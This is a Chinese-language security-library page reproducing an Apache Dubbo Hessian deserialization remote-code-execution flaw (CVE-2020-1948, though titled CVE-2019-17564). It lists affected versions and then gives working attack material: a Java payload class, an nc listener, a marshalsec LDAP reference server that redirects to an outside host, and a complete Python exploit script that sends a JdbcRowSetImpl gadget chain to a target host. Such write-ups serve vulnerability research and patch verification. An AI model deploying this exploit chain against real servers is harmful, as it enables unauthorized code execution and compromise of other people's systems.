CVE-2019-17564 Apache Dubbo 反序列化漏洞-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2019-17564 Apache Dubbo 反序列化漏洞

(CVE-2020-1948)Apache Dubbo 反序列化漏洞

一、漏洞简介

攻击者可以发送带有无法识别的服务名或方法名及某些恶意参数负载的RPC请求,当恶意参数被反序列化时将导致代码执行

二、漏洞影响

2.7.0 <= Apache Dubbo <= 2.7.7

2.6.0 <= Apache Dubbo <= 2.6.7

Apache Dubbo 全部 2.5.x 版本

三、复现过程

构造poc

## exp.java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class exp {
    public exp(){
        try {
            java.lang.Runtime.getRuntime().exec("calc.exe");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}

编译poc

javac exp.java

nc监听

nc -lvvp 12345

服务器开启web服务,并将生成好的exp.class放置web目录

启动 LDAP 代理服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://www.baidu.com/#exp 81

marshalsec 下载:

https://download.0-sec.org/download/marshalsec-0.0.3-SNAPSHOT-all.jar

py脚本测试

安装依赖包

pip install dubbo-py

运行

python poc.py www.target.com 12345 ldap://www.yourweb:81/exp

除了通过返回信息来判断外,观察 LDAP 代理是否出现请求转发也是判断POC利用是否成功的重要依据:

# LDAP Refer Server Output
Send LDAP reference result for exp redirecting to http://www.baidu.com/exp.class
# poc.py
# -*- coding: utf-8 -*-

import sys

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

if len(sys.argv) < 4:
  print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))
  print('\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))
  sys.exit()

client = DubboClient(sys.argv[1], int(sys.argv[2]))

JdbcRowSetImpl=new_object(
  'com.sun.rowset.JdbcRowSetImpl',
  dataSource=sys.argv[3],
  strMatchColumns=["foo"]
  )
JdbcRowSetImplClass=new_object(
  'java.lang.Class',
  name="com.sun.rowset.JdbcRowSetImpl",
  )
toStringBean=new_object(
  'com.rometools.rome.feed.impl.ToStringBean',
  beanClass=JdbcRowSetImplClass,
  obj=JdbcRowSetImpl
  )

resp = client.send_request_and_return_response(
  service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
  # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
  method_name='$invoke',
  args=[toStringBean])

output = str(resp)
if 'Fail to decode request due to: RpcInvocation' in output:
  print('[!] Target maybe not support deserialization.')
elif 'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()' in output:
   print('[+] Succeed.')
else:
  print('[!] Output:')
  print(output)
  print('[!] Target maybe not use dubbo-remoting library.')

参考链接

https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki

请登录后发表评论

    请登录后查看回复内容